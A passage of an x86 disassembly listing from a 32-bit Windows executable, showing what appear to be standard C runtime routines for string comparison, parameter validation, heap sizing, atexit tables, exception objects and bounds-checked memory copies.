		movzx	eax, byte ptr [eax]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		inc	[ebp+arg_0]
		mov	esi, eax
		movzx	eax, byte ptr [edi]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		add	esp, 10h
		inc	edi
		cmp	esi, ebx
		jz	short loc_402E22
		cmp	esi, eax
		jz	short loc_402DF4

loc_402E22:				; CODE XREF: sub_402D64+B8j
		sub	esi, eax
		mov	eax, esi
		pop	esi

loc_402E27:				; CODE XREF: sub_402D64+8Dj
		cmp	[ebp+var_4], bl
		jz	short loc_402E33
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_402E33:				; CODE XREF: sub_402D64+78j
					; sub_402D64+C6j
		pop	edi

loc_402E34:				; CODE XREF: sub_402D64+42j
		pop	ebx
		leave
		retn
sub_402D64	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402E37	proc near		; CODE XREF: sub_4182F6+34p
					; sub_4182F6+45p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, esi
		cmp	dword_428900, esi
		jnz	short loc_402E75
		cmp	[ebp+arg_0], esi
		jnz	short loc_402E69

loc_402E4A:				; CODE XREF: sub_402E37+35j
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		mov	eax, 7FFFFFFFh
		jmp	short loc_402E84
; ---------------------------------------------------------------------------

loc_402E69:				; CODE XREF: sub_402E37+11j
		cmp	[ebp+arg_4], esi
		jz	short loc_402E4A
		pop	esi
		pop	ebp
		jmp	sub_402D2F
; ---------------------------------------------------------------------------

loc_402E75:				; CODE XREF: sub_402E37+Cj
		push	esi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_402D64
		add	esp, 0Ch

loc_402E84:				; CODE XREF: sub_402E37+30j
		pop	esi
		pop	ebp
		retn
sub_402E37	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402E87	proc near		; CODE XREF: sub_402F77+51p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		push	esi
		push	edi
		jz	loc_402F70
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		cmp	[ebp+arg_0], ebx
		jnz	short loc_402ED9

loc_402EAB:				; CODE XREF: sub_402E87+57j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402ECF
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402ECF:				; CODE XREF: sub_402E87+3Fj
		mov	eax, 7FFFFFFFh
		jmp	loc_402F72
; ---------------------------------------------------------------------------

loc_402ED9:				; CODE XREF: sub_402E87+22j
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		jz	short loc_402EAB
		mov	esi, 7FFFFFFFh
		cmp	[ebp+arg_8], esi
		jbe	short loc_402F12
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402F0E
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402F0E:				; CODE XREF: sub_402E87+7Ej
		mov	eax, esi
		jmp	short loc_402F72
; ---------------------------------------------------------------------------

loc_402F12:				; CODE XREF: sub_402E87+61j
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_402F37
		push	[ebp+arg_8]
		push	edi
		push	[ebp+arg_0]
		call	sub_405DE0
		add	esp, 0Ch

loc_402F29:				; CODE XREF: sub_402E87+E7j
		cmp	[ebp+var_4], bl
		jz	short loc_402F72
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_402F72
; ---------------------------------------------------------------------------

loc_402F37:				; CODE XREF: sub_402E87+91j
					; sub_402E87+E1j
		mov	eax, [ebp+arg_0]
		movzx	eax, byte ptr [eax]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		inc	[ebp+arg_0]
		mov	esi, eax
		movzx	eax, byte ptr [edi]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		add	esp, 10h
		inc	edi
		dec	[ebp+arg_8]
		jz	short loc_402F6A
		cmp	esi, ebx
		jz	short loc_402F6A
		cmp	esi, eax
		jz	short loc_402F37

loc_402F6A:				; CODE XREF: sub_402E87+D9j
					; sub_402E87+DDj
		sub	esi, eax
		mov	eax, esi
		jmp	short loc_402F29
; ---------------------------------------------------------------------------

loc_402F70:				; CODE XREF: sub_402E87+Ej
		xor	eax, eax

loc_402F72:				; CODE XREF: sub_402E87+4Dj
					; sub_402E87+89j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_402E87	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402F77	proc near		; CODE XREF: sub_41A6CF+D3p
					; sub_41A89D+176p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, esi
		cmp	dword_428900, esi
		jnz	short loc_402FBE
		cmp	[ebp+arg_0], esi
		jnz	short loc_402FA9

loc_402F8A:				; CODE XREF: sub_402F77+35j
					; sub_402F77+3Ej
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		mov	eax, 7FFFFFFFh
		jmp	short loc_402FD0
; ---------------------------------------------------------------------------

loc_402FA9:				; CODE XREF: sub_402F77+11j
		cmp	[ebp+arg_4], esi
		jz	short loc_402F8A
		cmp	[ebp+arg_8], 7FFFFFFFh
		ja	short loc_402F8A
		pop	esi
		pop	ebp
		jmp	sub_405DE0
; ---------------------------------------------------------------------------

loc_402FBE:				; CODE XREF: sub_402F77+Cj
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_402E87
		add	esp, 10h

loc_402FD0:				; CODE XREF: sub_402F77+30j
		pop	esi
		pop	ebp
		retn
sub_402F77	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402FD3	proc near		; CODE XREF: sub_401C1D+1Ep
					; sub_401C1D+40p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_422858
		call	__SEH_prolog4
		xor	eax, eax
		mov	ebx, [ebp+arg_0]
		xor	edi, edi
		cmp	ebx, edi
		setnz	al
		cmp	eax, edi
		jnz	short loc_40300C
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_40305F
; ---------------------------------------------------------------------------

loc_40300C:				; CODE XREF: sub_402FD3+1Aj
		cmp	dword_439014, 3
		jnz	short loc_40304D
		push	4
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	ebx
		call	sub_4060E5
		pop	ecx
		mov	[ebp+var_20], eax
		cmp	eax, edi
		jz	short loc_403039
		mov	esi, [ebx-4]
		sub	esi, 9
		mov	[ebp+var_1C], esi
		jmp	short loc_40303C
; ---------------------------------------------------------------------------

loc_403039:				; CODE XREF: sub_402FD3+59j
		mov	esi, [ebp+var_1C]

loc_40303C:				; CODE XREF: sub_402FD3+64j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40306D
		cmp	[ebp+var_20], edi
		jnz	short loc_40305D

loc_40304D:				; CODE XREF: sub_402FD3+40j
		push	ebx
		push	edi
		push	dword_428A88
		call	ds:dword_41E190	; RtlSizeHeap
		mov	esi, eax

loc_40305D:				; CODE XREF: sub_402FD3+78j
		mov	eax, esi

loc_40305F:				; CODE XREF: sub_402FD3+37j
		call	__SEH_epilog4
		retn
sub_402FD3	endp


; =============== S U B	R O U T	I N E =======================================



sub_403065	proc near		; DATA XREF: zcrshv4o:00422870o
		xor	edi, edi
		mov	ebx, [ebp+8]
		mov	esi, [ebp-1Ch]
sub_403065	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40306D	proc near		; CODE XREF: sub_402FD3+70p
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_40306D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403076	proc near		; CODE XREF: sub_41AAD0+54p
		jmp	ds:dword_41E194
sub_403076	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40307C	proc near		; CODE XREF: sub_40177B+FEp
					; sub_40177B+12Fp ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= byte ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_4030A7
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403126
; ---------------------------------------------------------------------------

loc_4030A7:				; CODE XREF: sub_40307C+Cj
		mov	ecx, [ebp+arg_4]
		cmp	ecx, ebx
		push	esi
		mov	esi, [ebp+arg_0]
		jz	short loc_4030D3
		cmp	esi, ebx
		jnz	short loc_4030D3
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403125
; ---------------------------------------------------------------------------

loc_4030D3:				; CODE XREF: sub_40307C+34j
					; sub_40307C+38j
		mov	eax, 7FFFFFFFh
		cmp	ecx, eax
		mov	[ebp+var_1C], eax
		ja	short loc_4030E2
		mov	[ebp+var_1C], ecx

loc_4030E2:				; CODE XREF: sub_40307C+61j
		push	edi
		lea	eax, [ebp+arg_C]
		push	eax
		push	ebx
		push	[ebp+arg_8]
		lea	eax, [ebp+var_20]
		push	eax
		mov	[ebp+var_14], 42h
		mov	[ebp+var_18], esi
		mov	[ebp+var_20], esi
		call	sub_406F97
		add	esp, 10h
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_403124
		dec	[ebp+var_1C]
		js	short loc_403116
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_403122
; ---------------------------------------------------------------------------

loc_403116:				; CODE XREF: sub_40307C+91j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_403122:				; CODE XREF: sub_40307C+98j
		mov	eax, edi

loc_403124:				; CODE XREF: sub_40307C+8Cj
		pop	edi

loc_403125:				; CODE XREF: sub_40307C+55j
		pop	esi

loc_403126:				; CODE XREF: sub_40307C+29j
		pop	ebx
		leave
		retn
sub_40307C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403129	proc near		; CODE XREF: sub_401C1D+CFp
					; sub_417C06+15Fp ...
		jmp	sub_4034FB
sub_403129	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40312E	proc near		; CODE XREF: sub_40101C+Fp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_C]
		push	esi
		push	edi
		xor	edi, edi
		cmp	eax, edi
		jz	short loc_403183
		cmp	[ebp+arg_0], edi
		jnz	short loc_40315C

loc_403141:				; CODE XREF: sub_40312E+31j
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40314B:				; CODE XREF: sub_40312E+44j
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_403185
; ---------------------------------------------------------------------------

loc_40315C:				; CODE XREF: sub_40312E+11j
		cmp	[ebp+arg_8], edi
		jz	short loc_403141
		cmp	[ebp+arg_4], eax
		jnb	short loc_403174
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40314B
; ---------------------------------------------------------------------------

loc_403174:				; CODE XREF: sub_40312E+36j
		push	eax
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_407930
		add	esp, 0Ch

loc_403183:				; CODE XREF: sub_40312E+Cj
		xor	eax, eax

loc_403185:				; CODE XREF: sub_40312E+2Cj
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_40312E	endp


; =============== S U B	R O U T	I N E =======================================



sub_403189	proc near		; CODE XREF: sub_401065+11p
		mov	eax, ecx
		and	dword ptr [eax+4], 0
		and	dword ptr [eax+8], 0
		mov	dword ptr [eax], offset	off_41E38C
		retn
sub_403189	endp


; =============== S U B	R O U T	I N E =======================================



sub_40319A	proc near		; CODE XREF: sub_4015ED+2Fp
					; sub_40BFC7+15Dp

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		push	edi
		mov	edi, ecx
		mov	dword ptr [edi], offset	off_41E38C
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_4031D5
		push	eax
		call	sub_4046F0
		mov	esi, eax
		inc	esi
		push	esi
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[edi+4], eax
		jz	short loc_4031D9
		push	dword ptr [ebx]
		push	esi
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		jmp	short loc_4031D9
; ---------------------------------------------------------------------------

loc_4031D5:				; CODE XREF: sub_40319A+13j
		and	dword ptr [edi+4], 0

loc_4031D9:				; CODE XREF: sub_40319A+2Bj
					; sub_40319A+39j
		mov	dword ptr [edi+8], 1
		mov	eax, edi
		pop	edi
		pop	esi
		pop	ebx
		retn	4
sub_40319A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4031E8	proc near		; CODE XREF: sub_4035C0+Ap

arg_0		= dword	ptr  4

		mov	eax, ecx
		mov	ecx, [esp+arg_0]
		mov	dword ptr [eax], offset	off_41E38C
		mov	ecx, [ecx]
		and	dword ptr [eax+8], 0
		mov	[eax+4], ecx
		retn	8
sub_4031E8	endp


; =============== S U B	R O U T	I N E =======================================



sub_403200	proc near		; CODE XREF: sub_4013E6+15p
					; sub_4015ED+51p ...

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E38C
		mov	eax, [ebx+8]
		mov	[esi+8], eax
		test	eax, eax
		mov	eax, [ebx+4]
		push	edi
		jz	short loc_40324D
		test	eax, eax
		jz	short loc_403247
		push	eax
		call	sub_4046F0
		mov	edi, eax
		inc	edi
		push	edi
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[esi+4], eax
		jz	short loc_403250
		push	dword ptr [ebx+4]
		push	edi
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		jmp	short loc_403250
; ---------------------------------------------------------------------------

loc_403247:				; CODE XREF: sub_403200+1Ej
		and	dword ptr [esi+4], 0
		jmp	short loc_403250
; ---------------------------------------------------------------------------

loc_40324D:				; CODE XREF: sub_403200+1Aj
		mov	[esi+4], eax

loc_403250:				; CODE XREF: sub_403200+36j
					; sub_403200+45j ...
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		retn	4
sub_403200	endp


; =============== S U B	R O U T	I N E =======================================



sub_403258	proc near		; CODE XREF: sub_401038+6j
					; .text:0040104Cp ...
		cmp	dword ptr [ecx+8], 0
		mov	dword ptr [ecx], offset	off_41E38C
		jz	short locret_40326D
		push	dword ptr [ecx+4]
		call	sub_403B91
		pop	ecx

locret_40326D:				; CODE XREF: sub_403258+Aj
		retn
sub_403258	endp


; =============== S U B	R O U T	I N E =======================================



sub_40326E	proc near		; DATA XREF: zcrshv4o:0041E338o
					; zcrshv4o:0041E390o ...
		mov	eax, [ecx+4]
		test	eax, eax
		jnz	short locret_40327A
		mov	eax, offset aUnknownExcepti ; "Unknown exception"

locret_40327A:				; CODE XREF: sub_40326E+5j
		retn
sub_40326E	endp

; ---------------------------------------------------------------------------

loc_40327B:				; DATA XREF: zcrshv4o:off_41E38Co
		push	esi
		mov	esi, ecx
		call	sub_403258
		test	byte ptr [esp+8], 1
		jz	short loc_403291
		push	esi
		call	sub_4034FB
		pop	ecx

loc_403291:				; CODE XREF: .text:00403288j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_403297	proc near		; CODE XREF: sub_403373+18p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		push	ecx
		push	ebx
		push	ebp
		push	esi
		push	edi
		push	dword_438FF0
		call	sub_405753
		push	dword_438FEC
		mov	esi, eax
		mov	[esp+1Ch+var_4], esi
		call	sub_405753
		mov	edi, eax
		cmp	edi, esi
		pop	ecx
		pop	ecx
		jb	short loc_40333C
		mov	ebx, edi
		sub	ebx, esi
		lea	ebp, [ebx+4]
		cmp	ebp, 4
		jb	short loc_40333C
		push	esi
		call	sub_402FD3
		mov	esi, eax
		cmp	esi, ebp
		pop	ecx
		jnb	short loc_403323
		mov	eax, 800h
		cmp	esi, eax
		jnb	short loc_4032E4
		mov	eax, esi

loc_4032E4:				; CODE XREF: sub_403297+49j
		add	eax, esi
		cmp	eax, esi
		jb	short loc_4032FA
		push	eax
		push	[esp+18h+var_4]
		call	sub_407D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_403311

loc_4032FA:				; CODE XREF: sub_403297+51j
		lea	eax, [esi+10h]
		cmp	eax, esi
		jb	short loc_40333C
		push	eax
		push	[esp+18h+var_4]
		call	sub_407D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40333C

loc_403311:				; CODE XREF: sub_403297+61j
		sar	ebx, 2
		push	eax
		lea	edi, [eax+ebx*4]
		call	sub_4056E7
		pop	ecx
		mov	dword_438FF0, eax

loc_403323:				; CODE XREF: sub_403297+40j
		mov	esi, [esp+14h+arg_0]
		mov	[edi], esi
		add	edi, 4
		push	edi
		call	sub_4056E7
		mov	dword_438FEC, eax
		pop	ecx
		mov	eax, esi
		jmp	short loc_40333E
; ---------------------------------------------------------------------------

loc_40333C:				; CODE XREF: sub_403297+27j
					; sub_403297+33j ...
		xor	eax, eax

loc_40333E:				; CODE XREF: sub_403297+A3j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		retn
sub_403297	endp


; =============== S U B	R O U T	I N E =======================================



sub_403344	proc near		; DATA XREF: zcrshv4o:0041E2E0o
		push	esi
		push	4
		push	20h
		call	sub_407D3A
		mov	esi, eax
		push	esi
		call	sub_4056E7
		add	esp, 0Ch
		test	esi, esi
		mov	dword_438FF0, eax
		mov	dword_438FEC, eax
		jnz	short loc_40336C
		push	18h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40336C:				; CODE XREF: sub_403344+21j
		and	dword ptr [esi], 0
		xor	eax, eax
		pop	esi
		retn
sub_403344	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403373	proc near		; CODE XREF: sub_4033AF+4p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422878
		call	__SEH_prolog4
		call	sub_407E7C
		and	[ebp+ms_exc.disabled], 0
		push	[ebp+arg_0]
		call	sub_403297
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4033A9
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_403373	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033A9	proc near		; CODE XREF: sub_403373+28p
					; DATA XREF: zcrshv4o:00422890o
		call	sub_407E85
		retn
sub_4033A9	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033AF	proc near		; CODE XREF: sub_4035D9+45p
					; sub_407F39+44p ...

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		call	sub_403373
		neg	eax
		sbb	eax, eax
		neg	eax
		pop	ecx
		dec	eax
		retn
sub_4033AF	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033C1	proc near		; CODE XREF: sub_4080D9+15p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_4285A0, eax
		retn
sub_4033C1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2A8h


sub_4033CB	proc near		; CODE XREF: sub_4034C7+1Fj
					; sub_405FE8+21p ...

var_328		= dword	ptr -328h
var_31C		= dword	ptr -31Ch
var_2D8		= dword	ptr -2D8h
var_2D4		= dword	ptr -2D4h
var_2D0		= dword	ptr -2D0h
var_244		= word ptr -244h
var_240		= word ptr -240h
var_23C		= word ptr -23Ch
var_238		= word ptr -238h
var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= word ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= word ptr -208h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2A8h]
		sub	esp, 328h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2A8h+var_4], eax
		push	esi
		mov	[ebp+2A8h+var_220], eax
		mov	[ebp+2A8h+var_224], ecx
		mov	[ebp+2A8h+var_228], edx
		mov	[ebp+2A8h+var_22C], ebx
		mov	[ebp+2A8h+var_230], esi
		mov	[ebp+2A8h+var_234], edi
		mov	[ebp+2A8h+var_208], ss
		mov	[ebp+2A8h+var_214], cs
		mov	[ebp+2A8h+var_238], ds
		mov	[ebp+2A8h+var_23C], es
		mov	[ebp+2A8h+var_240], fs
		mov	[ebp+2A8h+var_244], gs
		pushf
		pop	[ebp+2A8h+var_210]
		mov	esi, [ebp+2ACh]
		lea	eax, [ebp+2ACh]
		mov	[ebp+2A8h+var_20C], eax
		mov	[ebp+2A8h+var_2D0], 10001h
		mov	[ebp+2A8h+var_218], esi
		mov	eax, [eax-4]
		push	50h
		mov	[ebp+2A8h+var_21C], eax
		lea	eax, [ebp+2A8h+var_328]
		push	0
		push	eax
		call	sub_408130
		lea	eax, [ebp+2A8h+var_328]
		mov	[ebp+2A8h+var_2D8], eax
		lea	eax, [ebp+2A8h+var_2D0]
		add	esp, 0Ch
		mov	[ebp+2A8h+var_328], 0C000000Dh
		mov	[ebp+2A8h+var_31C], esi
		mov	[ebp+2A8h+var_2D4], eax
		call	ds:off_41E08C
		push	0
		mov	esi, eax
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		lea	eax, [ebp+2A8h+var_2D8]
		push	eax
		call	ds:off_41E198
		test	eax, eax
		jnz	short loc_40349F
		test	esi, esi
		jnz	short loc_40349F
		push	2
		call	sub_408125
		pop	ecx

loc_40349F:				; CODE XREF: sub_4033CB+C6j
					; sub_4033CB+CAj
		push	0C000000Dh
		call	ds:dword_41E0C8	; GetCurrentProcess
		push	eax
		call	ds:off_41E0F4
		mov	ecx, [ebp+2A8h+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		add	ebp, 2A8h
		leave
		retn
sub_4033CB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4034C7	proc near		; CODE XREF: sub_402D64+29p
					; sub_402D64+5Fp ...
		push	ebp
		mov	ebp, esp
		push	dword_4285A0
		call	sub_405753
		test	eax, eax
		pop	ecx
		jz	short loc_4034DD
		pop	ebp
		jmp	eax
; ---------------------------------------------------------------------------

loc_4034DD:				; CODE XREF: sub_4034C7+11j
		push	2
		call	sub_408125
		pop	ecx
		pop	ebp
		jmp	sub_4033CB
sub_4034C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4034EB	proc near		; CODE XREF: sub_40164F+5p
					; sub_40164F+14p ...
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4034C7
		add	esp, 14h
		retn
sub_4034EB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4034FB	proc near		; CODE XREF: .text:00401059p
					; .text:004010D5p ...
		jmp	sub_403B91
sub_4034FB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403500	proc near		; CODE XREF: sub_401000+Fp
					; sub_4040B2+84p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, [ebp+arg_C]
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jnz	short loc_403512

loc_40350E:				; CODE XREF: sub_403500+4Bj
		xor	eax, eax
		jmp	short loc_403577
; ---------------------------------------------------------------------------

loc_403512:				; CODE XREF: sub_403500+Cj
		cmp	[ebp+arg_0], edi
		jnz	short loc_403532

loc_403517:				; CODE XREF: sub_403500+5Fj
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_403521:				; CODE XREF: sub_403500+72j
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_403577
; ---------------------------------------------------------------------------

loc_403532:				; CODE XREF: sub_403500+15j
		cmp	[ebp+arg_8], edi
		jz	short loc_40354D
		cmp	[ebp+arg_4], esi
		jb	short loc_40354D
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_4081B0
		add	esp, 0Ch
		jmp	short loc_40350E
; ---------------------------------------------------------------------------

loc_40354D:				; CODE XREF: sub_403500+35j
					; sub_403500+3Aj
		push	[ebp+arg_4]
		push	edi
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch
		cmp	[ebp+arg_8], edi
		jz	short loc_403517
		cmp	[ebp+arg_4], esi
		jnb	short loc_403574
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_403521
; ---------------------------------------------------------------------------

loc_403574:				; CODE XREF: sub_403500+64j
		push	16h
		pop	eax

loc_403577:				; CODE XREF: sub_403500+10j
					; sub_403500+30j
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_403500	endp


; =============== S U B	R O U T	I N E =======================================



sub_40357B	proc near		; CODE XREF: .text:0040358Cp
		push	ecx
		mov	dword ptr [ecx], offset	off_41E3AC
		call	sub_408515
		pop	ecx
		retn
sub_40357B	endp

; ---------------------------------------------------------------------------

loc_403589:				; DATA XREF: zcrshv4o:off_41E3ACo
		push	esi
		mov	esi, ecx
		call	sub_40357B
		test	byte ptr [esp+8], 1
		jz	short loc_40359F
		push	esi
		call	sub_4034FB
		pop	ecx

loc_40359F:				; CODE XREF: .text:00403596j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_4035A5	proc near		; CODE XREF: sub_40BFC7+12Dp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		add	ecx, 9
		push	ecx
		add	eax, 9
		push	eax
		call	sub_408590
		neg	eax
		pop	ecx
		sbb	eax, eax
		pop	ecx
		inc	eax
		retn	4
sub_4035A5	endp


; =============== S U B	R O U T	I N E =======================================



sub_4035C0	proc near		; CODE XREF: sub_4035D9+3Bp
		push	esi
		push	1
		push	offset off_424048
		mov	esi, ecx
		call	sub_4031E8
		mov	dword ptr [esi], offset	off_41E334
		mov	eax, esi
		pop	esi
		retn
sub_4035C0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4035D9	proc near		; CODE XREF: sub_401291+5p
					; sub_401395+5p ...

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		jmp	short loc_4035EE
; ---------------------------------------------------------------------------

loc_4035E1:				; CODE XREF: sub_4035D9+20j
		push	[ebp+arg_0]
		call	sub_408622
		test	eax, eax
		pop	ecx
		jz	short loc_4035FD

loc_4035EE:				; CODE XREF: sub_4035D9+6j
		push	[ebp+arg_0]
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		jz	short loc_4035E1
		leave
		retn
; ---------------------------------------------------------------------------

loc_4035FD:				; CODE XREF: sub_4035D9+13j
		test	byte ptr dword_4285B0, 1
		mov	esi, offset dword_4285A4
		jnz	short loc_403624
		or	dword_4285B0, 1
		mov	ecx, esi
		call	sub_4035C0
		push	offset loc_41D245
		call	sub_4033AF
		pop	ecx

loc_403624:				; CODE XREF: sub_4035D9+30j
		push	esi
		lea	ecx, [ebp+var_C]
